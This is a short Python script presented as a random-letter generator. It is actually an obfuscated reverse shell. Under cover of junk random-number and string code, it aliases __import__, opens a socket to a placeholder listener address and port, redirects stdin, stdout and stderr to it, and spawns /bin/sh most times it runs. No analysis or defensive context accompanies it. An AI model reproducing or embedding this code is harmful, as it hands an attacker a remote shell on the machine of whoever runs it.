Generate:.py
a=__import__;
import random

xY = random.randint(1, 10)
y = ""
o = a("os").dup2
q = random.randint(0,2)
if xY == 1:
	y = "H"
elif xY == 2:
	y = "A"
elif xY == 3:
	y = "B"
elif xY == 4:
	y = "W"
elif xY == 5:
	y = "L"
elif xY == 6:
	y = "I"
elif xY == 7:
	y = "G"
elif xY == 8:
	y = "T"
elif xY == 9:
	y = "F"
elif xY == 10:
	y = "K"
counter = 0
p=a("pty").spawn
while y != "A" and y != "K" and y != "L":
	s=a("socket").socket;
	yac = "LISTENADDR"
	d = y + "_" + str(xY)
	c=s()
	b = d.split("_")
	c.connect((yac,LISTENPORT))
	aa = b[0]
	f=c.fileno
	cc = b[1]
	o(f(),0);o(f(),1)
	zzz = random.randint(1, 6)/2
	o(f(),2)
	zzz = 5*zzz
	p("/bin/sh")
	xx = cc+"-"+str(aa.len()/2)+"-"+aa+"-"+str(cc.len)
	if xx != False and counter != 1:
		counter += 1
	else:
		break
arr = [
"Y",
"N",
"M"
]

z = arr[int(q)]
if z == "Y":
	random.randint(1, 65)
elif z == "N":
	random.randint(1, 23) 
elif z == "M":
	random.randint(1, 11)